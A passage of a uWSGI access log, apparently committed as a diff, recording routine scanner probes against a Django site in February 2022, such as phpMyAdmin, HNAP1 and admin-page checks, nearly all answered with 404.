vars in 753 bytes} [Wed Feb 16 19:18:57 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 99/1656] 106.15.199.114 () {36 vars in 749 bytes} [Wed Feb 16 19:18:57 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 100/1657] 106.15.199.114 () {36 vars in 761 bytes} [Wed Feb 16 19:18:57 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 101/1658] 106.15.199.114 () {36 vars in 781 bytes} [Wed Feb 16 19:18:57 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 102/1659] 106.15.199.114 () {36 vars in 745 bytes} [Wed Feb 16 19:18:57 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 103/1660] 106.15.199.114 () {36 vars in 749 bytes} [Wed Feb 16 19:18:57 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1435/1661] 106.15.199.114 () {36 vars in 715 bytes} [Wed Feb 16 19:18:58 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1436/1662] 106.15.199.114 () {36 vars in 715 bytes} [Wed Feb 16 19:18:58 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1437/1663] 106.15.199.114 () {36 vars in 701 bytes} [Wed Feb 16 19:18:58 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1438/1664] 106.14.171.157 () {38 vars in 646 bytes} [Wed Feb 16 20:05:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1439/1665] 106.14.171.157 () {38 vars in 692 bytes} [Wed Feb 16 20:05:48 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1440/1666] 106.14.171.157 () {38 vars in 658 bytes} [Wed Feb 16 20:05:48 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1441/1667] 106.14.171.157 () {38 vars in 695 bytes} [Wed Feb 16 20:05:48 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1442/1668] 106.14.171.157 () {40 vars in 755 bytes} [Wed Feb 16 20:05:49 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1443/1669] 106.14.171.157 () {40 vars in 757 bytes} [Wed Feb 16 20:05:49 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1444/1670] 106.14.171.157 () {40 vars in 787 bytes} [Wed Feb 16 20:05:49 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1445/1671] 106.14.171.157 () {40 vars in 767 bytes} [Wed Feb 16 20:05:49 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1446/1672] 106.14.171.157 () {40 vars in 757 bytes} [Wed Feb 16 20:05:49 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1447/1673] 106.14.171.157 () {40 vars in 757 bytes} [Wed Feb 16 20:05:49 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19139|app: 0|req: 5/1674] 106.14.171.157 () {40 vars in 743 bytes} [Wed Feb 16 20:05:49 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1448/1675] 192.53.160.38 () {34 vars in 413 bytes} [Wed Feb 16 20:07:52 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1449/1676] 106.14.214.22 () {38 vars in 645 bytes} [Wed Feb 16 20:22:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1450/1677] 106.14.214.22 () {38 vars in 691 bytes} [Wed Feb 16 20:22:33 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1451/1678] 106.14.214.22 () {38 vars in 657 bytes} [Wed Feb 16 20:22:33 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1452/1679] 106.14.214.22 () {38 vars in 694 bytes} [Wed Feb 16 20:22:33 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1453/1680] 106.14.214.22 () {40 vars in 754 bytes} [Wed Feb 16 20:22:33 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1454/1681] 106.14.214.22 () {40 vars in 756 bytes} [Wed Feb 16 20:22:33 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1455/1682] 106.14.214.22 () {40 vars in 786 bytes} [Wed Feb 16 20:22:33 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1456/1683] 106.14.214.22 () {40 vars in 766 bytes} [Wed Feb 16 20:22:33 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1457/1684] 106.14.214.22 () {40 vars in 756 bytes} [Wed Feb 16 20:22:33 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1458/1685] 106.14.214.22 () {40 vars in 756 bytes} [Wed Feb 16 20:22:33 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1459/1686] 106.14.214.22 () {40 vars in 742 bytes} [Wed Feb 16 20:22:33 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1460/1687] 106.14.126.66 () {38 vars in 645 bytes} [Wed Feb 16 20:55:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1461/1688] 106.14.126.66 () {38 vars in 691 bytes} [Wed Feb 16 20:55:39 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1462/1689] 106.14.126.66 () {38 vars in 657 bytes} [Wed Feb 16 20:55:39 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1463/1690] 106.14.126.66 () {38 vars in 694 bytes} [Wed Feb 16 20:55:39 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1464/1691] 106.14.126.66 () {40 vars in 754 bytes} [Wed Feb 16 20:55:40 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1465/1692] 106.14.126.66 () {40 vars in 756 bytes} [Wed Feb 16 20:55:40 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1466/1693] 106.14.126.66 () {40 vars in 786 bytes} [Wed Feb 16 20:55:40 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1467/1694] 106.14.126.66 () {40 vars in 766 bytes} [Wed Feb 16 20:55:40 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1468/1695] 106.14.126.66 () {40 vars in 756 bytes} [Wed Feb 16 20:55:40 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1469/1696] 106.14.126.66 () {40 vars in 756 bytes} [Wed Feb 16 20:55:40 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1470/1697] 106.14.126.66 () {40 vars in 742 bytes} [Wed Feb 16 20:55:40 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1471/1698] 34.79.139.22 () {42 vars in 731 bytes} [Wed Feb 16 21:05:55 2022] POST /Api/Session => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1472/1699] 106.14.183.3 () {34 vars in 602 bytes} [Wed Feb 16 21:19:15 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 104/1700] 106.14.183.3 () {34 vars in 648 bytes} [Wed Feb 16 21:19:15 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1473/1701] 106.14.183.3 () {34 vars in 614 bytes} [Wed Feb 16 21:19:15 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1474/1702] 106.14.183.3 () {34 vars in 649 bytes} [Wed Feb 16 21:19:15 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1475/1703] 106.14.183.3 () {36 vars in 710 bytes} [Wed Feb 16 21:19:15 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1476/1704] 106.14.183.3 () {36 vars in 712 bytes} [Wed Feb 16 21:19:15 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1477/1705] 106.14.183.3 () {36 vars in 742 bytes} [Wed Feb 16 21:19:15 2022] GET /login/img/product_logo.png => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1478/1706] 106.14.183.3 () {36 vars in 722 bytes} [Wed Feb 16 21:19:15 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1479/1707] 106.14.183.3 () {36 vars in 741 bytes} [Wed Feb 16 21:19:15 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1480/1708] 106.14.183.3 () {36 vars in 781 bytes} [Wed Feb 16 21:19:15 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 50/1709] 106.14.183.3 () {36 vars in 751 bytes} [Wed Feb 16 21:19:15 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 51/1710] 106.14.183.3 () {36 vars in 747 bytes} [Wed Feb 16 21:19:15 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 23/1711] 106.14.183.3 () {36 vars in 759 bytes} [Wed Feb 16 21:19:15 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 24/1712] 106.14.183.3 () {36 vars in 779 bytes} [Wed Feb 16 21:19:15 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 25/1713] 106.14.183.3 () {36 vars in 743 bytes} [Wed Feb 16 21:19:15 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1481/1714] 106.14.183.3 () {36 vars in 747 bytes} [Wed Feb 16 21:19:16 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1482/1715] 106.14.183.3 () {36 vars in 713 bytes} [Wed Feb 16 21:19:16 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1483/1716] 106.14.183.3 () {36 vars in 713 bytes} [Wed Feb 16 21:19:16 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1484/1717] 106.14.183.3 () {36 vars in 699 bytes} [Wed Feb 16 21:19:16 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1485/1718] 183.136.225.14 () {30 vars in 414 bytes} [Wed Feb 16 22:23:34 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1486/1719] 183.136.225.14 () {32 vars in 475 bytes} [Wed Feb 16 22:23:54 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1487/1720] 183.136.225.14 () {32 vars in 497 bytes} [Wed Feb 16 22:23:54 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1488/1721] 183.136.225.14 () {32 vars in 495 bytes} [Wed Feb 16 22:23:54 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1489/1722] 23.251.102.90 () {34 vars in 487 bytes} [Wed Feb 16 22:33:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1490/1723] 106.14.45.145 () {22 vars in 234 bytes} [Wed Feb 16 22:43:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 105/1724] 106.14.45.145 () {22 vars in 295 bytes} [Wed Feb 16 22:43:22 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1491/1725] 106.14.45.145 () {22 vars in 238 bytes} [Wed Feb 16 22:43:30 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1492/1726] 106.14.45.145 () {22 vars in 237 bytes} [Wed Feb 16 22:43:34 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1493/1727] 106.14.45.145 () {40 vars in 483 bytes} [Wed Feb 16 22:43:39 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1494/1728] 39.99.229.34 () {32 vars in 408 bytes} [Wed Feb 16 22:51:46 2022] GET /text4041645051906 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1495/1729] 39.99.229.34 () {34 vars in 410 bytes} [Wed Feb 16 22:51:46 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1496/1730] 39.99.229.34 () {28 vars in 306 bytes} [Wed Feb 16 22:51:47 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19140|app: 0|req: 4/1731] 39.99.229.34 () {32 vars in 394 bytes} [Wed Feb 16 22:51:47 2022] GET /evox/about => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1497/1732] 39.99.229.34 () {32 vars in 384 bytes} [Wed Feb 16 22:51:47 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1498/1733] 39.99.229.34 () {36 vars in 462 bytes} [Wed Feb 16 22:51:57 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19140|app: 0|req: 5/1734] 39.99.229.34 () {34 vars in 413 bytes} [Wed Feb 16 22:51:58 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1499/1735] 209.17.96.202 () {30 vars in 410 bytes} [Wed Feb 16 23:09:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1500/1736] 83.97.20.34 () {30 vars in 329 bytes} [Wed Feb 16 23:11:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1501/1737] 101.133.140.114 () {32 vars in 515 bytes} [Thu Feb 17 00:21:24 2022] GET /nmaplowercheck1645057284 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1502/1738] 101.133.140.114 () {32 vars in 487 bytes} [Thu Feb 17 00:21:24 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1503/1739] 101.133.140.114 () {34 vars in 503 bytes} [Thu Feb 17 00:21:36 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1504/1740] 101.133.140.114 () {32 vars in 477 bytes} [Thu Feb 17 00:21:37 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1505/1741] 101.133.140.114 () {28 vars in 309 bytes} [Thu Feb 17 00:21:56 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1506/1742] 136.144.41.117 () {40 vars in 568 bytes} [Thu Feb 17 00:30:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1507/1743] 83.97.20.34 () {26 vars in 286 bytes} [Thu Feb 17 00:40:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1508/1744] 106.15.204.102 () {38 vars in 646 bytes} [Thu Feb 17 01:06:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 52/1745] 106.15.204.102 () {38 vars in 692 bytes} [Thu Feb 17 01:06:05 2022] GET /explicit_not_exist_path => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1509/1746] 106.15.204.102 () {38 vars in 658 bytes} [Thu Feb 17 01:06:05 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1510/1747] 106.15.204.102 () {38 vars in 695 bytes} [Thu Feb 17 01:06:05 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1511/1748] 106.15.204.102 () {40 vars in 755 bytes} [Thu Feb 17 01:06:06 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1512/1749] 106.15.204.102 () {40 vars in 757 bytes} [Thu Feb 17 01:06:06 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 21/1750] 106.15.204.102 () {40 vars in 787 bytes} [Thu Feb 17 01:06:06 2022] GET /login/img/product_logo.png => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 22/1751] 106.15.204.102 () {40 vars in 767 bytes} [Thu Feb 17 01:06:06 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1513/1752] 106.15.204.102 () {40 vars in 757 bytes} [Thu Feb 17 01:06:06 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1514/1753] 106.15.204.102 () {40 vars in 757 bytes} [Thu Feb 17 01:06:06 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1515/1754] 106.15.204.102 () {40 vars in 743 bytes} [Thu Feb 17 01:06:06 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1516/1755] 106.14.14.193 () {34 vars in 602 bytes} [Thu Feb 17 01:37:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1517/1756] 106.14.14.193 () {34 vars in 648 bytes} [Thu Feb 17 01:37:58 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1518/1757] 106.14.14.193 () {34 vars in 614 bytes} [Thu Feb 17 01:37:58 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1519/1758] 106.14.14.193 () {34 vars in 651 bytes} [Thu Feb 17 01:37:58 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 5 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1520/1759] 106.14.14.193 () {36 vars in 712 bytes} [Thu Feb 17 01:37:58 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1521/1760] 106.14.14.193 () {36 vars in 714 bytes} [Thu Feb 17 01:37:58 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1522/1761] 106.14.14.193 () {36 vars in 744 bytes} [Thu Feb 17 01:37:58 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1523/1762] 106.14.14.193 () {36 vars in 724 bytes} [Thu Feb 17 01:37:58 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1524/1763] 106.14.14.193 () {36 vars in 742 bytes} [Thu Feb 17 01:37:58 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1525/1764] 106.14.14.193 () {36 vars in 782 bytes} [Thu Feb 17 01:37:58 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1526/1765] 106.14.14.193 () {36 vars in 752 bytes} [Thu Feb 17 01:37:58 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1527/1766] 106.14.14.193 () {36 vars in 748 bytes} [Thu Feb 17 01:37:58 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1528/1767] 106.14.14.193 () {36 vars in 760 bytes} [Thu Feb 17 01:37:58 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1529/1768] 106.14.14.193 () {36 vars in 780 bytes} [Thu Feb 17 01:37:58 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 106/1769] 106.14.14.193 () {36 vars in 744 bytes} [Thu Feb 17 01:37:58 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 107/1770] 106.14.14.193 () {36 vars in 748 bytes} [Thu Feb 17 01:37:58 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 108/1771] 106.14.14.193 () {36 vars in 714 bytes} [Thu Feb 17 01:37:58 2022] GET /phpMyAdmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 109/1772] 106.14.14.193 () {36 vars in 714 bytes} [Thu Feb 17 01:37:59 2022] GET /phpmyadmin/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 110/1773] 106.14.14.193 () {36 vars in 700 bytes} [Thu Feb 17 01:37:59 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1530/1774] 